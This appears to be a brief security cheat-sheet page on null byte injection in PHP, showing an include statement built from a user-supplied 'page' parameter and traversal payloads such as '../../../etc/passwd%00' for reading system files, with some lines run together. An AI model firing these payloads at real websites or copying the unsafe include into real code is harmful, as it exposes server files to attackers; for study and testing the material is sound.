Null Byte Injection
Example
$file = $_GET['page'];
require_once("/var/www/$file.php");passwd = $_GET['page'];
require_once("/var/www/../../../etc/passwd.php");Null Byte
http://website/page=../../../etc/passwd%00
http://example.com/page=../../../../../../etc/passwd?
/etc/passwd%00jpg Last updated